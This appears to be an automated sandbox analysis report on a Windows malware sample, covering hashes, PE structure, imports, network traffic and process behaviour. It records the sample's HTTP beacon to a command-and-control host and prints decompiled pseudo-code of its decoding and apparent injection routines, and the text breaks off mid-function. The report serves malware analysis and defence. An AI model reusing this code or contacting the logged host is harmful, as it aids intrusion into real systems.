SHA-512:	268C6AD044318D14509FF2C6BD015A9A4F8ACA9946EDBB8F2323599A9CF0F253477D054838167AF8C6DA393339581B7ED53B32964C413953DF4F7581A489C066
Malicious:	false
Reputation:	low

C:\Users\user\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
Process:	C:\Program Files\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 4-bit colormap, non-interlaced
Size (bytes):	237
Entropy (8bit):	6.1480026084285395
Encrypted:	false
MD5:	9FB559A691078558E77D6848202F6541
SHA1:	EA13848D33C2C7F4F4BAA39348AEB1DBFAD3DF31
SHA-256:	6D8A01DC7647BC218D003B58FE04049E24A9359900B7E0CEBAE76EDF85B8B914
SHA-512:	0E08938568CD123BE8A20B87D9A3AAF5CB05249DE7F8286FF99D3FA35FC7AF7A9D9797DD6EFB6D1E722147DCFB74437DE520395234D0009D452FB96A8ECE236B
Malicious:	false
Reputation:	low

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{F5B32550-C6EC-11E8-A1F8-44AC2DAE138A}.dat
Process:	C:\Program Files\Internet Explorer\iexplore.exe
File Type:	Microsoft Word Document
Size (bytes):	21592
Entropy (8bit):	1.7627604255262714
Encrypted:	false
MD5:	A06D7B4CA86645FD6907B1248E3B4775
SHA1:	6CD6CC371A1B08EE05C14EE8513496A353569982
SHA-256:	037DC37D0382D95D73B98219FEEBF099F1FDC96F8A51B71A13BAE885B9B05D50
SHA-512:	7616DA33EB92F11B6270C1BF746C7E339CB67693A321176DD53E7E98E2E3D7186AC638FB3810B70891F29B775D878B9E1D845411A5220840D0815724D35AABFD
Malicious:	false
Reputation:	low

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{F5B32552-C6EC-11E8-A1F8-44AC2DAE138A}.dat
Process:	C:\Program Files\Internet Explorer\iexplore.exe
File Type:	Microsoft Word Document
Size (bytes):	16984
Entropy (8bit):	1.5772396259895078
Encrypted:	false
MD5:	4AA3ABB003514E1CEFC4BD0847C6CBD6
SHA1:	9677A883402ABFFB3D1226223956FB2302D2884D
SHA-256:	2226D184979E293213BED7F088811E4E8E789E3D28211568A6122DF0E50B3C71
SHA-512:	14DDE72B90922243F49AC5E8BE62F4B42C91EFF2A1794D97CE169FA7D0231C1FD57F52E0A173BE3094DD94958A49E4581FE069B9E1FFB40FCFC388BDE9BDF0CC
Malicious:	false
Reputation:	low

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\FF8G8DG0\favicon[1].ico
Process:	C:\Program Files\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 4-bit colormap, non-interlaced
Size (bytes):	237
Entropy (8bit):	6.1480026084285395
Encrypted:	false
MD5:	9FB559A691078558E77D6848202F6541
SHA1:	EA13848D33C2C7F4F4BAA39348AEB1DBFAD3DF31
SHA-256:	6D8A01DC7647BC218D003B58FE04049E24A9359900B7E0CEBAE76EDF85B8B914
SHA-512:	0E08938568CD123BE8A20B87D9A3AAF5CB05249DE7F8286FF99D3FA35FC7AF7A9D9797DD6EFB6D1E722147DCFB74437DE520395234D0009D452FB96A8ECE236B
Malicious:	false
Reputation:	low

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
doc.rendes.at	47.254.153.156	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://doc.rendes.at/wpapi/XlhPkWURsPeX9n/KdgCvOhJyTpK7WR6Gbx1E/EGIHNIQTXREQOMps/rPc05MTJOZBIhXE/5m9k63AYGwTnA9kVzH/_2BvJ_2Bu/qT25s_2Bd32_2FwmnoO7/VJJFaK5GX9ndvILO9eE/_2BmLslnLM1_2Bzpzpe8w6/7wEfNRxzT1pne/O97RG4NY/OoJbmGnwE2owDOmHjuVKPJu/as3X3i37Pg/GbArsAQV3tEr4y9/hOi	false		unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Country	Flag	ASN	ASN Name	Malicious
47.254.153.156	United States		45102	CNNIC-ALIBABA-CN-NET-APAlibabaChinaTechnologyCoLtd	false

Private

IP
192.168.2.255

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.528337649042211
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	zbetcheckin_tracker_propan.exe
File size:	183296
MD5:	7e17f0f35d50f49407841372f24fbd38
SHA1:	921ad55a3f593239b906163cf1bb8001194822f3
SHA256:	934c3445fe9d1a3d4cca4d3ec09c9191d8f9067e13e58fa0b288cb520cd40785
SHA512:	8200be71fc9015e9160ce7a3f665a917e058c8ee8753c178f43cf62a519154cafd83125787b565748c9061d9fcbe3c96f65edfa2dbc01c17f0e20f540386a1d1
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......(.."l..ql..ql..qK0.q...qK0.q:..q...qe..ql..q...qK0.qp..qK0.qm..qr..qm..qRichl..q........................PE..L....v.[...........

File Icon

Static PE Info

General
Entrypoint:	0x40ca12
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x5BB076BF [Sun Sep 30 07:09:51 2018 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	65787a6837f68f71463896efdbebc84c

Entrypoint Preview

Instruction
call 00007FBDAD823FE1h
jmp 00007FBDAD820A8Bh
mov eax, dword ptr [esp+04h]
mov dword ptr [00436074h], eax
ret
push ebp
lea ebp, dword ptr [esp-000002A8h]
sub esp, 00000328h
mov eax, dword ptr [0042C4A0h]
xor eax, ebp
mov dword ptr [ebp+000002A4h], eax
push esi
mov dword ptr [ebp+00000088h], eax
mov dword ptr [ebp+00000084h], ecx
mov dword ptr [ebp+00000080h], edx
mov dword ptr [ebp+7Ch], ebx
mov dword ptr [ebp+78h], esi
mov dword ptr [ebp+74h], edi
mov word ptr [ebp+000000A0h], ss
mov word ptr [ebp+00000094h], cs
mov word ptr [ebp+70h], ds
mov word ptr [ebp+6Ch], es
mov word ptr [ebp+68h], fs
mov word ptr [ebp+64h], gs
pushfd
pop dword ptr [ebp+00000098h]
mov esi, dword ptr [ebp+000002ACh]
lea eax, dword ptr [ebp+000002ACh]
mov dword ptr [ebp+0000009Ch], eax
mov dword ptr [ebp-28h], 00010001h
mov dword ptr [ebp+00000090h], esi
mov eax, dword ptr [eax-04h]
push 00000050h
mov dword ptr [ebp+0000008Ch], eax
lea eax, dword ptr [ebp-80h]
push 00000000h
push eax
call 00007FBDAD823FDEh
lea eax, dword ptr [ebp-80h]
mov dword ptr [ebp-30h], eax
lea eax, dword ptr [ebp-28h]
add esp, 0Ch
mov dword ptr [ebp-80h], C000000Dh
mov dword ptr [ebp-74h], esi
mov dword ptr [ebp-2Ch], eax

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x2ab50	0x64	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x37000	0x1458	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x18b68	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x17000	0x218	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x1562a	0x15800	False	0.545387445494	data	6.51475744719	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x17000	0x146f6	0x14800	False	0.76806640625	data	6.25790724155	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x2c000	0xac18	0x1200	False	0.344835069444	data	3.39487152334	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x37000	0x1458	0x1600	False	0.437144886364	data	4.50632518873	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type
RT_CURSOR	0x374d8	0x134	data
RT_CURSOR	0x37628	0x134	data
RT_ICON	0x37788	0x568	GLS_BINARY_LSB_FIRST
RT_ICON	0x37cf0	0x468	GLS_BINARY_LSB_FIRST
RT_DIALOG	0x372f0	0xe2	data
RT_DIALOG	0x373d8	0xe2	data
RT_GROUP_CURSOR	0x374c0	0x14	Lotus 1-2-3
RT_GROUP_CURSOR	0x37610	0x14	Lotus 1-2-3
RT_GROUP_ICON	0x37760	0x22	MS Windows icon resource - 2 icons, 16x16, 256-colors
RT_VERSION	0x38158	0x19c	data
RT_MANIFEST	0x382f8	0x15a	ASCII text, with CRLF line terminators

Imports

DLL	Import
USER32.dll	DefWindowProcA, MessageBoxA, DestroyWindow, UpdateWindow, ShowWindow, GetMenu, AdjustWindowRect, EndDialog, InvalidateRect, wsprintfA, SetWindowTextA, DrawMenuBar, BeginPaint, EndPaint, IsIconic, MoveWindow, PostQuitMessage, GetWindowLongA, DialogBoxParamA, LoadStringA, EnableMenuItem, GetWindowRect, SendMessageA, SetWindowPos, PostMessageA, GetMessageA, TranslateMessage, DispatchMessageA, MessageBeep, LoadIconA, LoadCursorA, RegisterClassA, GetSystemMetrics, CreateWindowExA
comdlg32.dll	GetOpenFileNameA
VERSION.dll	GetFileVersionInfoSizeW, VerQueryValueW, GetFileVersionInfoW
KERNEL32.dll	GetDateFormatA, RtlUnwind, InitializeCriticalSection, Sleep, CompareStringA, GetCurrentProcessId, InterlockedDecrement, GetCurrentThreadId, SetLastError, InterlockedIncrement, TlsFree, TlsSetValue, TlsAlloc, TlsGetValue, GetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, IsDebuggerPresent, GetVersionExA, CompareStringW, GlobalFindAtomW, GlobalAddAtomW, GlobalFlags, GetTickCount, GetACP, GetLocaleInfoA, RaiseException, HeapFree, HeapAlloc, GetProcessHeap, GetStartupInfoW, GetSystemTimeAsFileTime, ExitProcess, VirtualAlloc, GetProcAddress, GetModuleHandleA, GetVersion, GetCurrentProcess, WideCharToMultiByte, WriteFile, LoadLibraryA, lstrcpyA, LCMapStringW, MultiByteToWideChar, CreatePipe, GetExitCodeProcess, SetFilePointer, GetDriveTypeA, GetCurrentDirectoryA, CreateFileA, SetEnvironmentVariableW, SetEnvironmentVariableA, WriteConsoleW, GetConsoleOutputCP, WriteConsoleA, IsValidLocale, EnumSystemLocalesA, GetStringTypeW, GetStringTypeA, GetConsoleMode, GetConsoleCP, GetTimeZoneInformation, GetTimeFormatA, QueryPerformanceCounter, VirtualFree, HeapCreate, HeapDestroy, GetStartupInfoA, SetHandleCount, GetCommandLineA, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetEnvironmentStrings, FreeEnvironmentStringsA, GetModuleFileNameA, GetStdHandle, FlushFileBuffers, LCMapStringA, IsValidCodePage, GetOEMCP, GetCPInfo, VirtualQuery, GetSystemInfo, VirtualProtect, HeapSize, GetFileType, SetStdHandle, HeapReAlloc, SetUnhandledExceptionFilter, UnhandledExceptionFilter, TerminateProcess

Version Infos

Description	Data
InternalName	IMSG
FileDescription	Parser
FileVersion	1748
CompanyName	loxlox
Translation	0x0409 0x04b0

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 3, 2018 11:16:29.028738976 CEST	55984	53	192.168.2.2	8.8.8.8
Oct 3, 2018 11:16:29.415028095 CEST	53	55984	8.8.8.8	192.168.2.2
Oct 3, 2018 11:16:29.426309109 CEST	49233	80	192.168.2.2	47.254.153.156
Oct 3, 2018 11:16:29.427006006 CEST	49234	80	192.168.2.2	47.254.153.156
Oct 3, 2018 11:16:29.450634956 CEST	80	49233	47.254.153.156	192.168.2.2
Oct 3, 2018 11:16:29.450643063 CEST	80	49234	47.254.153.156	192.168.2.2
Oct 3, 2018 11:16:29.450722933 CEST	49233	80	192.168.2.2	47.254.153.156
Oct 3, 2018 11:16:29.450733900 CEST	49234	80	192.168.2.2	47.254.153.156
Oct 3, 2018 11:16:29.452330112 CEST	49233	80	192.168.2.2	47.254.153.156
Oct 3, 2018 11:16:29.476313114 CEST	80	49233	47.254.153.156	192.168.2.2
Oct 3, 2018 11:16:32.098453045 CEST	50783	53	192.168.2.2	8.8.8.8
Oct 3, 2018 11:16:32.103457928 CEST	51303	53	192.168.2.2	8.8.8.8
Oct 3, 2018 11:16:32.113343000 CEST	53	50783	8.8.8.8	192.168.2.2
Oct 3, 2018 11:16:32.118056059 CEST	53	51303	8.8.8.8	192.168.2.2
Oct 3, 2018 11:16:32.121105909 CEST	55522	53	192.168.2.2	8.8.8.8
Oct 3, 2018 11:16:32.135778904 CEST	53	55522	8.8.8.8	192.168.2.2
Oct 3, 2018 11:16:33.461882114 CEST	59398	53	192.168.2.2	8.8.8.8
Oct 3, 2018 11:16:33.471844912 CEST	55803	53	192.168.2.2	8.8.8.8
Oct 3, 2018 11:16:33.476080894 CEST	53	59398	8.8.8.8	192.168.2.2
Oct 3, 2018 11:16:33.486018896 CEST	53	55803	8.8.8.8	192.168.2.2

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 3, 2018 11:16:29.028738976 CEST	55984	53	192.168.2.2	8.8.8.8
Oct 3, 2018 11:16:29.415028095 CEST	53	55984	8.8.8.8	192.168.2.2
Oct 3, 2018 11:16:32.098453045 CEST	50783	53	192.168.2.2	8.8.8.8
Oct 3, 2018 11:16:32.103457928 CEST	51303	53	192.168.2.2	8.8.8.8
Oct 3, 2018 11:16:32.113343000 CEST	53	50783	8.8.8.8	192.168.2.2
Oct 3, 2018 11:16:32.118056059 CEST	53	51303	8.8.8.8	192.168.2.2
Oct 3, 2018 11:16:32.121105909 CEST	55522	53	192.168.2.2	8.8.8.8
Oct 3, 2018 11:16:32.135778904 CEST	53	55522	8.8.8.8	192.168.2.2
Oct 3, 2018 11:16:33.461882114 CEST	59398	53	192.168.2.2	8.8.8.8
Oct 3, 2018 11:16:33.471844912 CEST	55803	53	192.168.2.2	8.8.8.8
Oct 3, 2018 11:16:33.476080894 CEST	53	59398	8.8.8.8	192.168.2.2
Oct 3, 2018 11:16:33.486018896 CEST	53	55803	8.8.8.8	192.168.2.2

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Oct 3, 2018 11:16:29.028738976 CEST	192.168.2.2	8.8.8.8	0xd536	Standard query (0)	doc.rendes.at	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Oct 3, 2018 11:16:29.415028095 CEST	8.8.8.8	192.168.2.2	0xd536	No error (0)	doc.rendes.at		47.254.153.156	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

doc.rendes.at

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.2	49233	47.254.153.156	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Oct 3, 2018 11:16:29.452330112 CEST	1	OUT	GET /wpapi/XlhPkWURsPeX9n/KdgCvOhJyTpK7WR6Gbx1E/EGIHNIQTXREQOMps/rPc05MTJOZBIhXE/5m9k63AYGwTnA9kVzH/_2BvJ_2Bu/qT25s_2Bd32_2FwmnoO7/VJJFaK5GX9ndvILO9eE/_2BmLslnLM1_2Bzpzpe8w6/7wEfNRxzT1pne/O97RG4NY/OoJbmGnwE2owDOmHjuVKPJu/as3X3i37Pg/GbArsAQV3tEr4y9/hOi HTTP/1.1 Accept: text/html, application/xhtml+xml, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: doc.rendes.at Connection: Keep-Alive

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: zbetcheckin_tracker_propan.exe PID: 2384 Parent PID: 2168

General

Start time:	11:14:17
Start date:	03/10/2018
Path:	C:\Users\user\Desktop\zbetcheckin_tracker_propan.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\zbetcheckin_tracker_propan.exe'
Imagebase:	0x400000
File size:	183296 bytes
MD5 hash:	7E17F0F35D50F49407841372F24FBD38
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: iexplore.exe PID: 2296 Parent PID: 560

General

Start time:	11:16:07
Start date:	03/10/2018
Path:	C:\Program Files\Internet Explorer\iexplore.exe
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Imagebase:	0x13ff20000
File size:	814288 bytes
MD5 hash:	446332D1A5576870E436B13AEB27CA8E
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: iexplore.exe PID: 2776 Parent PID: 2296

General

Start time:	11:16:08
Start date:	03/10/2018
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2296 CREDAT:275457 /prefetch:2
Imagebase:	0x260000
File size:	815304 bytes
MD5 hash:	F2831268EC600225F611DC02166EACF0
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: zbetcheckin_tracker_propan.exe PID: 2384 Parent PID: 2168

Execution Graph

Execution Coverage:	12.4%
Dynamic/Decrypted Code Coverage:	3.1%
Signature Coverage:	15.6%
Total number of Nodes:	1406
Total number of Limit Nodes:	87

Executed Functions

Function 004010ED, Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 169
filestringthread

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E004010ED() {
				short _v60;
				short _v68;
				unsigned int _v76;
				void _v92;
				long _v96;
				intOrPtr _v100;
				struct tagPOINT _v108;
				signed int _v112;
				struct tagPOINT _v120;
				signed int _v124;
				void* __esi;
				long _t44;
				void* _t45;
				signed int _t46;
				signed int _t52;
				unsigned int _t57;
				long _t58;
				intOrPtr _t59;
				long _t61;
				signed int _t64;
				void* _t71;
				void* _t72;
				signed int _t77;
				signed int _t86;
				signed int _t89;
				signed int _t91;
				long _t93;
				signed int _t94;
				signed char* _t95;
				signed char* _t98;
				signed int* _t104;
				void* _t105;
				void* _t106;
				signed int _t108;
				signed int _t112;
				WCHAR* _t131;

				_v112 = _v112 & 0x00000000;
				_t108 = E00401B9B();
				if(_t108 != 0) {
					L26:
					return _t108;
				} else {
					GetCursorPos( &_v108);
					_t108 = 0xc;
					while(1) {
						_t44 = WaitForSingleObject( *0x405474, 0x40); // executed
						if(_t44 == 0) {
							break;
						}
						GetCursorPos( &_v120);
						_t90 = _v108.y ^ _v108.x;
						_t86 = E00401C7A((_v120.y ^ _v120.x) - (_v108.y ^ _v108.x) & 0x0000001f); // executed
						_t108 = _t86;
						if(_t108 == 0xc) {
							continue;
						}
						break;
					}
					if(_t108 != 0) {
						goto L26;
					}
					_t45 = E00401DA8(_t90); // executed
					_t122 = _t45;
					if(_t45 != 0) {
						 *0x405480 = 1; // executed
					}
					_t46 = E00401070(_t90, _t122); // executed
					_t108 = _t46;
					if(_t108 != 0) {
						L24:
						if(_t108 == 0xffffffff) {
							_t108 = GetLastError();
						}
						goto L26;
					}
					_t108 = E004027FD();
					if(_t108 != 0) {
						goto L24;
					}
					E00401C0F(_t90); // executed
					_t91 = 6;
					memset( &_v92, 0, _t91 << 2);
					_t52 =  *0x405498; // 0x736c6e70
					if(E0040286F(0,  &_v92,  &_v76, _t52 ^ 0xed79247c) == 0) {
						_t108 = 0xb;
						goto L24;
					}
					_t57 = _v76;
					_v124 = _v124 & _t108;
					_t104 = _v92;
					_t89 =  *0x405494; // 0x0
					_t93 = _t57;
					_t58 = _t57 >> 2;
					_v108.x = _t93;
					_t98 = _t104;
					_v120.x = _t58;
					if(_t58 == 0) {
						L13:
						_t94 = _t93 & 0x00000003;
						if(_t94 == 0) {
							L16:
							_t131 =  *0x40548c; // 0x22e89e0
							if(_t131 != 0) {
								wsprintfW( &_v68, 0x4040e0, GetCurrentProcessId());
								_t71 = CreateFileMappingW(0xffffffff, 0, 4, 0, lstrlenW( *0x40548c) + _t69 + 2,  &_v60); // executed
								if(_t71 != 0) {
									_t72 = MapViewOfFile(_t71, 6, 0, 0, 0); // executed
									_t105 = _t72;
									if(_t105 != 0) {
										lstrcpyW(_t105,  *0x40548c);
										UnmapViewOfFile(_t105);
									}
								}
							}
							if(( *0x405480 & 0x00000001) != 0) {
								_v112 = 0x10;
							}
							_t59 =  *0x405478; // 0x950
							_v100 = _t59;
							_v96 = GetCurrentThreadId();
							_t61 =  *0x405474; // 0x8c
							_v108.x = _t61;
							_v108.y = GetCurrentThread();
							_t64 = E0040143E( &_v92,  &_v108, _v112); // executed
							_t108 = _t64;
							goto L24;
						}
						_t112 = _t94;
						_t95 = _t98;
						_t106 = _t104 - _t98;
						do {
							 *_t95 =  *(_t106 + _t95) ^ _t89;
							_t95 =  &(_t95[1]);
							_t112 = _t112 - 1;
						} while (_t112 != 0);
						goto L16;
					} else {
						goto L11;
					}
					do {
						L11:
						_v124 = _v124 + 1;
						_t77 =  *_t104;
						asm("rol eax, cl");
						_t104 =  &(_t104[1]);
						_t108 = _t77 ^ _t108 ^ _t89;
						 *_t98 = _t108;
						_t98 =  &(_t98[4]);
						_t22 =  &_v120;
						 *_t22 = _v120.x - 1;
					} while ( *_t22 != 0);
					_t93 = _v108.x;
					goto L13;
				}
			}

0x004010f6
0x00401103
0x00401107
0x004012ed
0x004012f5
0x0040110d
0x00401118
0x0040111c
0x0040111d
0x00401125
0x0040112d
0x00000000
0x00000000
0x00401134
0x00401142
0x0040114c
0x00401151
0x00401156
0x00000000
0x00000000
0x00000000
0x00401156
0x0040115a
0x00000000
0x00000000
0x00401160
0x00401165
0x00401167
0x00401169
0x00401169
0x00401173
0x00401178
0x0040117c
0x004012e0
0x004012e3
0x004012eb
0x004012eb
0x00000000
0x004012e3
0x00401187
0x0040118b
0x00000000
0x00000000
0x00401191
0x0040119a
0x0040119f
0x004011a1
0x004011bd
0x004012df
0x00000000
0x004012df
0x004011c3
0x004011c7
0x004011cb
0x004011cf
0x004011d5
0x004011d7
0x004011da
0x004011de
0x004011e0
0x004011e4
0x0040120a
0x0040120a
0x0040120d
0x00401220
0x00401222
0x00401228
0x0040123b
0x00401260
0x00401268
0x00401270
0x00401276
0x0040127a
0x00401283
0x0040128a
0x0040128a
0x0040127a
0x00401268
0x00401297
0x00401299
0x00401299
0x004012a1
0x004012a6
0x004012b0
0x004012b4
0x004012b9
0x004012c7
0x004012d4
0x004012d9
0x00000000
0x004012d9
0x0040120f
0x00401211
0x00401213
0x00401215
0x0040121a
0x0040121c
0x0040121d
0x0040121d
0x00000000
0x00000000
0x00000000
0x00000000
0x004011e6
0x004011e6
0x004011e6
0x004011ea
0x004011f0
0x004011f2
0x004011f9
0x004011fb
0x004011fd
0x00401200
0x00401200
0x00401200
0x00401206
0x00000000
0x00401206

APIs

Part of subcall function 00401B9B: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00401103,?,00000000), ref: 00401BAA
Part of subcall function 00401B9B: GetVersion.KERNEL32(?,00000000), ref: 00401BB9
Part of subcall function 00401B9B: GetCurrentProcessId.KERNEL32(?,00000000), ref: 00401BD0
Part of subcall function 00401B9B: OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000000), ref: 00401BE9

GetCursorPos.USER32(?), ref: 00401118
WaitForSingleObject.KERNEL32(00000040,?,00000000), ref: 00401125
GetCursorPos.USER32(?), ref: 00401134

Part of subcall function 00401C7A: lstrcpynA.KERNEL32(?,.bss,00000008,767F1218,0000000C), ref: 00401CA8
Part of subcall function 00401C7A: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 00401D1B
Part of subcall function 00401C7A: memcpy.NTDLL(?,00000000,?,?,?,00000001), ref: 00401D64
Part of subcall function 00401C7A: VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,00000001), ref: 00401D7D

Part of subcall function 00401DA8: GetModuleHandleA.KERNEL32(KERNEL32.DLL,0000000C,?,?,00401165,?,00000000), ref: 00401DC5
Part of subcall function 00401DA8: GetProcAddress.KERNEL32(00000000,IsWow64Process,?,?,00401165,?,00000000), ref: 00401DD6
Part of subcall function 00401DA8: IsWow64Process.KERNELBASE(0000008C,00000000,0000000C,?,?,00401165,?,00000000), ref: 00401DEE

Part of subcall function 00401070: StrStrIA.SHLWAPI(00000000,?), ref: 004010C7
Part of subcall function 00401070: HeapFree.KERNEL32(00000000,?,?), ref: 004010E1

GetLastError.KERNEL32(?,00000000), ref: 004012E5

Part of subcall function 004027FD: GetModuleHandleA.KERNEL32(NTDLL.DLL,767F1218,00000000,?,?,00401187,?,00000000), ref: 0040280E
Part of subcall function 004027FD: GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,?,00401187,?,00000000), ref: 0040281E

Part of subcall function 00401C0F: GetLongPathNameW.KERNEL32 ref: 00401C3B
Part of subcall function 00401C0F: GetLongPathNameW.KERNEL32 ref: 00401C59

Part of subcall function 0040286F: memcpy.NTDLL(00000000,?,?,?,00000000,0000000C,?,?,?,?,00401091,?,?,736C6E70,767F1218,0000000C), ref: 0040294D

GetCurrentProcessId.KERNEL32(?,?,736C6E70,?,00000000), ref: 0040122A
wsprintfW.USER32 ref: 0040123B
lstrlenW.KERNEL32(?), ref: 0040124F
CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,?), ref: 00401260
MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 00401270
lstrcpyW.KERNEL32(00000000), ref: 00401283
UnmapViewOfFile.KERNEL32(00000000), ref: 0040128A
GetCurrentThreadId.KERNEL32(?,?,736C6E70,?,00000000), ref: 004012AA
GetCurrentThread.KERNEL32(?,00000000), ref: 004012BD

Part of subcall function 0040143E: memcpy.NTDLL(?,?,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040156C
Part of subcall function 0040143E: memcpy.NTDLL(?,?,00000018,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 004015BB
Part of subcall function 0040143E: memcpy.NTDLL(?,00401699,00000800,?,?,?,00000000), ref: 0040162B
Part of subcall function 0040143E: NtUnmapViewOfSection.NTDLL ref: 00401656
Part of subcall function 0040143E: RtlNtStatusToDosError.NTDLL ref: 0040165D
Part of subcall function 0040143E: CloseHandle.KERNEL32 ref: 0040166C
Part of subcall function 0040143E: memset.NTDLL ref: 00401680

Strings

pnls, xrefs: 004011A1

Memory Dump Source

Source File: 00000001.00000002.3011495595.0000000000400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: memcpy$CurrentHandleProcess$FileModuleView$CreateCursorErrorFreeLongNamePathThreadUnmapVirtual$AddressAllocCloseEventHeapLastMappingObjectOpenProcSectionSingleStatusVersionWaitWow64lstrcpylstrcpynlstrlenmemsetwsprintf
String ID: pnls
API String ID: 430617508-141991303
Opcode ID: cb9a3086c6c9c2d782002ab388e474d75f09457ec9b77396b7070ae190fd9d25
Instruction ID: 63aa70c8748f49fe6436392524b71879d85cc5050a50cbbfc132656fe63e4243
Opcode Fuzzy Hash: cb9a3086c6c9c2d782002ab388e474d75f09457ec9b77396b7070ae190fd9d25
Instruction Fuzzy Hash: AB51C3729042109BC7219F65DD48A5BBBE8EB88355F04067EFA84F72A0C734D8048B9D

Function 0040C832, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 133
memory

C-Code - Quality: 75%

			E0040C832(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _t29;
				signed int _t39;
				signed int _t40;
				signed int _t42;
				CHAR* _t43;
				signed int _t45;
				signed int _t46;
				signed int _t47;
				void* _t48;
				intOrPtr _t49;
				intOrPtr _t51;
				signed int _t67;
				void* _t68;
				void* _t69;
				signed int _t70;
				long _t73;
				signed int _t77;
